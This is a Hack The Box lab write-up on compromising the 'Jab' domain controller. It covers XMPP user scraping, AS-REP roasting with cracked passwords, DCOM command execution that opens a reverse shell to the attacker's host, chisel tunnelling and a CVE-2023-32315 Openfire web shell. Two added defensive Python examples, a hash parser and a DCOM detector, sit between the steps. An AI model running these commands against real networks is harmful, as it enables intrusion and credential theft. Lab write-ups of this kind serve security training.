HTB | JAB
Machine - https://app.hackthebox.com/machines/Jab
IP - 10.10.11.4
NMAP
└─$ nmap -sC -sV -p 53,88,135,139,389,445,593,5270,5276,7070,7443,49665,49667,49673,49694,49699,49781 10.10.11.4 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 19:56 IST
Nmap scan report for 10.10.11.4
Host is up (0.58s latency).
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-26 14:26:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: jab.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2025-08-26T14:28:25+00:00; +3s from scanner time.
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
5270/tcp  open  ssl/xmpp      Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5276/tcp  open  ssl/jabber    Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     capabilities: 
|     features: 
|     xmpp: 
|     compression_methods: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|_    unknown: 
7070/tcp  open  http          Jetty
|_http-title: Openfire HTTP Binding Service
7443/tcp  open  ssl/http      Jetty
|_http-title: Openfire HTTP Binding Service
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49781/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2025-08-26T14:28:08
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 3s, deviation: 0s, median: 2s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.36 seconds
Port 53
└─$ dig any @10.10.11.4 jab.htb                     
; <<>> DiG 9.20.8-6-Debian <<>> any @10.10.11.4 jab.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32277
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;jab.htb.                       IN      ANY
;; ANSWER SECTION:
jab.htb.                600     IN      A       10.10.11.4
jab.htb.                3600    IN      NS      dc01.jab.htb.
jab.htb.                3600    IN      SOA     dc01.jab.htb. hostmaster.jab.htb. 8239 900 600 86400 3600
;; ADDITIONAL SECTION:
dc01.jab.htb.           3600    IN      A       10.10.11.4
;; Query time: 423 msec
;; SERVER: 10.10.11.4#53(10.10.11.4) (TCP)
;; WHEN: Tue Aug 26 20:01:25 IST 2025
;; MSG SIZE  rcvd: 134
┌──(anurag㉿anurag)-[~/htb/Jab]
└─$ dig axfr @10.10.11.4 jab.htb
; <<>> DiG 9.20.8-6-Debian <<>> axfr @10.10.11.4 jab.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
Port 445
└─$ smbclient -N -L \\\\10.10.11.4
Anonymous login successful
        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Noting the successful anonymous login, I tried SMB null-session enumeration of usernames via RID cycling, but the anonymous session did not have permission to make the RPC calls.
└─$ netexec smb jab.htb -u "" -p "" --rid-brute
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.4      445    DC01             [+] jab.htb\: 
SMB         10.10.11.4      445    DC01             [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
Port 88
ldapsearch -H ldap://10.10.11.4 -x -s base namingcontexts 
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#
#
dn:
namingcontexts: DC=jab,DC=htb
namingcontexts: CN=Configuration,DC=jab,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=jab,DC=htb
namingcontexts: DC=DomainDnsZones,DC=jab,DC=htb
namingcontexts: DC=ForestDnsZones,DC=jab,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
We are not able to enumerate anything further anonymously:
ldapsearch -H ldap://10.10.11.4 -x -b "DC=jab,DC=htb"    
# extended LDIF
#
# LDAPv3
# base <DC=jab,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090CE5, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
I tried user enumeration via Kerbrute, but the run was taking too long (it looked like a rabbit hole).
└─$ ./kerbrute userenum --dc 10.10.11.4 -d jab.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 1000 -o kerbrute.txt
We found more than 1800 valid usernames.
Let’s try AS-REP Roasting.
└─$ grep '@' kerbrute.txt | awk -v FS=' ' '{print $7}' | cut -d '@' -f 1 > as_rep_list_kerbrute.txt
I tried impacket-GetNPUsers, but since it was taking too much time, I moved on.
└─$ impacket-GetNPUsers 'jab.htb/' -usersfile as_rep_list_kerbrute.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.11.4
Port 5270
XMPP is the Extensible Messaging and Presence Protocol, a set of open technologies for instant messaging, presence, multi-party chat, voice and video calls, collaboration, lightweight middleware, content syndication, and generalized routing of XML data.
(reference - https://bishopfox.com/blog/xmpp-underappreciated-attack-surface)
Let’s try to connect via Pidgin
I’ll open Pidgin and it says I have no accounts configured:

I’ll click “Add…” and select XMPP from the “Protocol” drop-down, and fill out the rest:

Let’s accept the certificate

Now it prompts for registration; let’s do that


Now we can select our user and the chat panel pops up

From the menu, “Tools” –> “Room List” will give a series of dialogs that leads to a list of the rooms on this server:

conference.jab.htb is automatically filled in. Clicking “Find Rooms” returns two:

I don’t have access to the test room

But we can join the test2 room, and it has some messages

The image is just base64-encoded text
┌──(anurag㉿anurag)-[~/htb/Jab]
└─$ echo "VGhlIGltYWdlIGRhdGEgZ29lcyBoZXJlCg==" | base64 -d  
The image data goes here
On looking around, we find “Search for Users”

and it gives us a search directory


On searching, it spat out everything

But there isn’t a way to export the list.
Asking ChatGPT for a way to export it suggested opening the debug window and running the search again

Now I can save it

Let’s copy the list
└─$ grep -oE '[A-Za-z0-9]{1,}\@jab.htb' purple-debug.log | grep -v 'anurag@jab.htb' | sort -u > jabber_emails.txt
We can extract the usernames from the addresses:
└─$ cat jabber_emails.txt | cut -d '@' -f 1 > jabber_usernames.txt
Foothold/shell
Shell as svc_openfire
ASREP Roast
Now, with this new list, we can perform AS-REP Roasting, and we find three hashes
└─$ impacket-GetNPUsers 'jab.htb/' -usersfile jabber_usernames.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.11.4
└─$ cat hashes.aspreroast       
$krb5asrep$23$jmontgomery@JAB.HTB:745e57fb259d72d045af15f70442bc62$dc298d5fad838ededed90e9f10edf0c43db5ba5cf0393723d55690c0766fc50a6b511b72f617fdcc66e57fb5179fcd6623d373abaef4317957a0e7ece0faef8215aab447c30ccea7919be99d95e27e015352ae35fe20b199b8218fbfdfc4ba694aa9e5b84f40f53246685240846cc1bfab3c0f3070e3d02031591234896a8b56243b910b1d3af1ff2ccb8e70c19812052a330e68d06e99f481d8b842013271374c9edb23019968735a8b40d8776efc917ccf2f6464230fb41dda2c41db06ec94c880bd0c3c603a9616ccac55d57f382fd8477cea913947ce20e1cff943c29c4c0df4
$krb5asrep$23$lbradford@JAB.HTB:6837dd5e228d94a222b8075f2d636615$6783ed990b03d29ec3beeb4b5800b31af97014b7230515b72d69dcce3bf98d250da9566a701a246dbe2a70d04bef55bfe68a7b305050c53e61a882195626d0aedbdc2c4e07936fb1ea9843b6aaab49bd58adad4b510bc57da962d23993058805cead5e4b0447abbc2289213c06e327d9aced24bdb784bf7ce646a347ee874d7212a5b083ae3b58d6dddc96ecb8544a051cfda4e214d47714f543b482d7c478104e8006b511f113fb33ab00b250a174b74fa2342c370e7d5351e7faf2e18872b6fbce43fbfc4d3464efe9a9dad06f59fa39d185f6a9270664fcaa7008d34fd2f4590a
$krb5asrep$23$mlowe@JAB.HTB:6ca2295aadfff0a40efe575c243a6085$0d48e79ff36a9454a2c1565c4c4d584495defaf216f03f83c46f7a6b74e7b6593ad78dffcbaa0011b8c1a67dcd7680b14e970e436102f5329b538d166dbb11ca839cb52c17af86ca04322d8e33bad2cd2b8e84b7eb73e7e28bdd8045a5b8aed62e2d8075ee436c33673009701ab8a68a8c1078b2625d5b7c7c3b9019f451a5a3ebe6834ddf71eb64762fa0c1d04b4fc43adfba5bc365004ffd3d27632f5e188520a1910e12ca851c36be006074c642dee529461461b5e0d13023fda0029934272ac54a78ff59221d4ac5aed71f78b412d85c3804deec8eba3d515d15dd717fed17c8
Let’s crack them
└─$ hashcat hashes.aspreroast /home/anurag/stuff/rockyou.txt 
<--SNIP-->
$krb5asrep$23$jmontgomery@JAB.HTB:745e57fb259d72d045af15f70442bc62$dc298d5fad838ededed90e9f10edf0c43db5ba5cf0393723d55690c0766fc50a6b511b72f617fdcc66e57fb5179fcd6623d373abaef4317957a0e7ece0faef8215aab447c30ccea7919be99d95e27e015352ae35fe20b199b8218fbfdfc4ba694aa9e5b84f40f53246685240846cc1bfab3c0f3070e3d02031591234896a8b56243b910b1d3af1ff2ccb8e70c19812052a330e68d06e99f481d8b842013271374c9edb23019968735a8b40d8776efc917ccf2f6464230fb41dda2c41db06ec94c880bd0c3c603a9616ccac55d57f382fd8477cea913947ce20e1cff943c29c4c0df4:Midnight_121
<--SNIP-->
We found jmontgomery’s credentials.
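The hash lines above are in the hashcat mode 18200 layout that impacket-GetNPUsers writes with -format hashcat: `$krb5asrep$<etype>$<user>@<REALM>:<checksum>$<ciphertext>`. The following parser is an added example and is not part of the original writeup or of impacket; it splits such lines into their fields so the affected accounts can be listed and reviewed (the sample hashes in SAMPLE are constructed, not real output).

```python
"""Parse AS-REP roast hash lines in the hashcat mode 18200 layout
($krb5asrep$23$user@REALM:checksum$ciphertext), as produced by
impacket-GetNPUsers -format hashcat. Added example, not part of the
original writeup; the SAMPLE lines are constructed, not real hashes."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One line per account that has Kerberos pre-authentication disabled:
#   $krb5asrep$<etype>$<user>@<REALM>:<16-byte HMAC-MD5 checksum, hex>$<RC4 ciphertext, hex>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@:$]+)@(?P<realm>[^:$]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


@dataclass
class AsRepHash:
    etype: int
    user: str
    realm: str
    checksum: bytes
    edata: bytes

    @property
    def principal(self) -> str:
        return f"{self.user}@{self.realm}"


def parse_asrep(line: str) -> Optional[AsRepHash]:
    """Parse one line; None if it is not a well-formed etype-23 AS-REP hash."""
    m = ASREP_RE.match(line.strip())
    if m is None:
        return None
    if len(m["edata"]) % 2:          # odd hex length: truncated or corrupted line
        return None
    return AsRepHash(
        etype=int(m["etype"]),
        user=m["user"],
        realm=m["realm"],
        checksum=bytes.fromhex(m["checksum"]),
        edata=bytes.fromhex(m["edata"]),
    )


def parse_asrep_file(text: str) -> List[AsRepHash]:
    """Parse every well-formed line. Blank lines, <--SNIP--> markers and
    hashcat's cracked-output lines (which carry a trailing :password) are skipped."""
    return [h for h in (parse_asrep(l) for l in text.splitlines()) if h is not None]


def principals(hashes: List[AsRepHash]) -> List[str]:
    """Sorted, de-duplicated user@REALM list: the accounts to review for
    the 'Do not require Kerberos preauthentication' flag."""
    return sorted({h.principal for h in hashes})


# Constructed sample: two valid lines, one with a truncated checksum
SAMPLE = "\n".join([
    "$krb5asrep$23$jdoe@EXAMPLE.LOCAL:" + "0123456789abcdef" * 2 + "$" + "deadbeef" * 8,
    "$krb5asrep$23$svc_app@EXAMPLE.LOCAL:" + "fedcba9876543210" * 2 + "$" + "c0ffee00" * 10,
    "$krb5asrep$23$broken@EXAMPLE.LOCAL:abcd$" + "00" * 4,
])

if __name__ == "__main__":
    for h in parse_asrep_file(SAMPLE):
        print(h.principal, "etype", h.etype, "ciphertext bytes", len(h.edata))
```

Only the etype-23 (RC4) layout shown on this page is handled; the AES layouts (hashcat mode 32100) put the fields in a different order and would need a second pattern.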
We can authenticate via LDAP and SMB:
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.4 -d jab.htb -u jmontgomery -p  'Midnight_121'; echo; done
LDAP        10.10.11.4      389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
LDAPS       10.10.11.4      636    DC01             [+] jab.htb\jmontgomery:Midnight_121 
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.4      445    DC01             [+] jab.htb\jmontgomery:Midnight_121 
WINRM       10.10.11.4      5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.4      5985   DC01             [-] jab.htb\jmontgomery:Midnight_121
└─$ netexec smb jab.htb -u "jmontgomery" -p "Midnight_121" --shares
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.4      445    DC01             [+] jab.htb\jmontgomery:Midnight_121 
SMB         10.10.11.4      445    DC01             [*] Enumerated shares
SMB         10.10.11.4      445    DC01             Share           Permissions     Remark
SMB         10.10.11.4      445    DC01             -----           -----------     ------
SMB         10.10.11.4      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4      445    DC01             C$                              Default share
SMB         10.10.11.4      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4      445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.4      445    DC01             SYSVOL          READ            Logon server share 
Since we do not find anything interesting via SMB, let’s see if we can connect to XMPP with jmontgomery’s credentials.
Connecting jmontgomery over XMPP
Let’s connect jmontgomery over XMPP

Now we can see a new Room

Let’s connect to that room

From this chat, we now know the credentials of svc_openfire.
We can authenticate via LDAP and SMB:
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.4 -d jab.htb -u svc_openfire -p  '!@#$%^&*(1qazxsw'; echo; done
LDAP        10.10.11.4      389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
LDAPS       10.10.11.4      636    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw 
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.4      445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw 
WINRM       10.10.11.4      5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.4      5985   DC01             [-] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
Nothing new was there over SMB either:
└─$ netexec smb jab.htb -u svc_openfire -p  '!@#$%^&*(1qazxsw' --shares
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.4      445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw 
SMB         10.10.11.4      445    DC01             [*] Enumerated shares
SMB         10.10.11.4      445    DC01             Share           Permissions     Remark
SMB         10.10.11.4      445    DC01             -----           -----------     ------
SMB         10.10.11.4      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4      445    DC01             C$                              Default share
SMB         10.10.11.4      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4      445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.4      445    DC01             SYSVOL          READ            Logon server share 
Bloodhound
└─$ bloodhound-python -u svc_openfire -p  '!@#$%^&*(1qazxsw' -d jab.htb -ns 10.10.11.4 -c All --zip
On analysing the collected data, we found the edge SVC_OPENFIRE@JAB.HTB -> ExecuteDCOM -> DC01.JAB.HTB

ExecuteDCOM
The user SVC_OPENFIRE@JAB.HTB has membership in the Distributed COM Users local group on the computer DC01.JAB.HTB.
This can allow code execution under certain conditions by instantiating a COM object on a remote machine and invoking its methods.
DCOM is built on top of the TCP/IP RPC protocol (TCP port 135 plus high ephemeral ports) and may leverage several different RPC interface UUIDs (outlined here). In order to use DCOM, one must be authenticated. Consequently, logon events and authentication-specific logs (Kerberos, NTLM, etc.) will be generated when using DCOM.
reference - https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model and https://bloodhound.specterops.io/resources/edges/execute-dcom
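The edge description above makes the defender-side point: DCOM activation needs an authenticated network logon, and the MMC20.Application method used below runs its command as a child of mmc.exe. The following detector is an added example (not from the writeup, BloodHound or ired.team) that correlates those two signals over a constructed stream of Security 4624 and Sysmon process-creation records; the field names follow the Sysmon/Security log conventions, and the events themselves are made up for the example.

```python
"""Flag process creations that match MMC20.Application DCOM execution:
a shell interpreter whose parent is mmc.exe, correlated with a preceding
network (type 3) logon for the same account on the same host.
Added example, not part of the original writeup; the events below are
constructed Sysmon/Security-style records, not real telemetry."""
import json
from typing import Dict, List, Tuple

# Interpreters that an ExecuteShellCommand call would typically launch;
# any of them running under mmc.exe is worth an alert.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
          "cscript.exe", "mshta.exe", "rundll32.exe"}

# Constructed sample stream (one JSON record per line), roughly what a SIEM ingests:
#   EventID 4624 / LogonType 3 = Security log network logon (DCOM must authenticate)
#   EventID 1                  = Sysmon process creation
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 4624, "Computer": "DC01", "LogonType": 3,
     "TargetUserName": "svc_openfire", "IpAddress": "10.10.16.4"},
    {"EventID": 1, "Computer": "DC01", "User": "JAB\\svc_openfire",
     "ParentImage": "C:\\Windows\\System32\\mmc.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c ping 10.10.16.4"},
    {"EventID": 1, "Computer": "DC01", "User": "JAB\\alice",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mmc.exe",
     "CommandLine": "mmc.exe dsa.msc"},              # benign: admin opening a console
    {"EventID": 1, "Computer": "DC01", "User": "JAB\\bob",
     "ParentImage": "C:\\Windows\\System32\\mmc.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -e AAAA"},           # suspicious, but no network logon seen
])


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_mmc20_dcom(log_text: str) -> List[Dict]:
    """Return one alert per shell spawned by mmc.exe. Severity is 'high' when the
    same account had a network logon on that host earlier in the stream
    (consistent with remote DCOM activation), otherwise 'medium'."""
    network_logons: Dict[Tuple[str, str], str] = {}   # (host, user) -> source IP
    alerts: List[Dict] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        host = ev.get("Computer", "")
        if ev.get("EventID") == 4624 and ev.get("LogonType") == 3:
            network_logons[(host, ev.get("TargetUserName", "").lower())] = ev.get("IpAddress", "")
            continue
        if ev.get("EventID") != 1:
            continue
        if basename(ev.get("ParentImage", "")) != "mmc.exe":
            continue
        child = basename(ev.get("Image", ""))
        if child not in SHELLS:
            continue
        # drop the DOMAIN\ prefix so the name matches the 4624 TargetUserName
        user = ev.get("User", "").rsplit("\\", 1)[-1].lower()
        source_ip = network_logons.get((host, user))
        alerts.append({
            "host": host,
            "user": user,
            "child": child,
            "command_line": ev.get("CommandLine", ""),
            "source_ip": source_ip,
            "severity": "high" if source_ip else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_mmc20_dcom(SAMPLE_LOG):
        print(alert)
```

In a real pipeline the logon lookup would be bounded by a time window rather than kept for the whole stream, and the source IP from the 4624 event is what lets the analyst tie the mmc.exe child back to the host that initiated the DCOM call.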
Let’s try to ping our machine from the box via DCOM MMC20
└─$ impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'ping 10.10.16.4'  
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
└─$ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
16:37:25.757965 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 148, length 40
16:37:25.758023 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 148, length 40
16:37:27.004052 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 149, length 40
16:37:27.004075 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 149, length 40
16:37:27.692570 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 150, length 40
16:37:27.692601 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 150, length 40
16:37:28.701264 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 151, length 40
16:37:28.701296 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 151, length 40
Now we can try to get a reverse shell
└─$ impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'powershell -e <base64 payload omitted>'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.4] 64596
PS C:\windows\system32> whoami
jab\svc_openfire
PS C:\windows\system32> 
We find user.txt:
    Directory: C:\Users\svc_openfire\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/27/2025   5:38 AM             34 user.txt
Privilege Escalation
Shell as Administrator
Port forwarding
We can see ports 9090 and 9091 being hosted internally

Let’s use chisel to do the port forwarding
└─$ ./chisel server -p 8000 --reverse                                                                                                     
2025/08/27 17:10:57 server: Reverse tunnelling enabled
2025/08/27 17:10:57 server: Fingerprint 6qfipdw2+WXV3ZOS8xqEf2y8vPvQ2oJEc/h01ys52WU=
2025/08/27 17:10:57 server: Listening on http://0.0.0.0:8000
2025/08/27 17:12:12 server: session#1: Client version (1.10.1) differs from server version (0.0.0-src)
2025/08/27 17:12:12 server: session#1: tun: proxy#R:9090=>9090: Listening
2025/08/27 17:12:12 server: session#1: tun: proxy#R:9091=>9091: Listening
PS C:\temp> .\chisel.exe client 10.10.16.4:8000 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091
└─$ nmap -sCV -p9090,9091 localhost
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-27 17:14 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000096s latency).
Other addresses for localhost (not scanned): ::1
PORT     STATE SERVICE            VERSION
9090/tcp open  hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info: 
|_  Logs: jive-ibtn jive-btn-gradient
| hadoop-tasktracker-info: 
|_  Logs: jive-ibtn jive-btn-gradient
|_http-title: Site doesn't have a title (text/html).
9091/tcp open  ssl/http           Jetty
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.21 seconds
Openfire admin console
We can see there is an Openfire admin console on port 9091

We can log in as svc_openfire

CVE-2023-32315
I found this GitHub repository. Now I need to upload openfire-management-tool-plugin.jar, then go to Server > Server Settings > Management tool and access the web shell with the password "123"



Here we can see the program’s home page

Now we have to select System Command

and we can execute commands

and we are nt authority\system

We get root.txt

We can also get a reverse shell

└─$ nc -nlvp 9001                  
listening on [any] 9001 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.4] 65362
PS C:\Program Files\Openfire\bin> whoami
nt authority\system
PS C:\Program Files\Openfire\bin>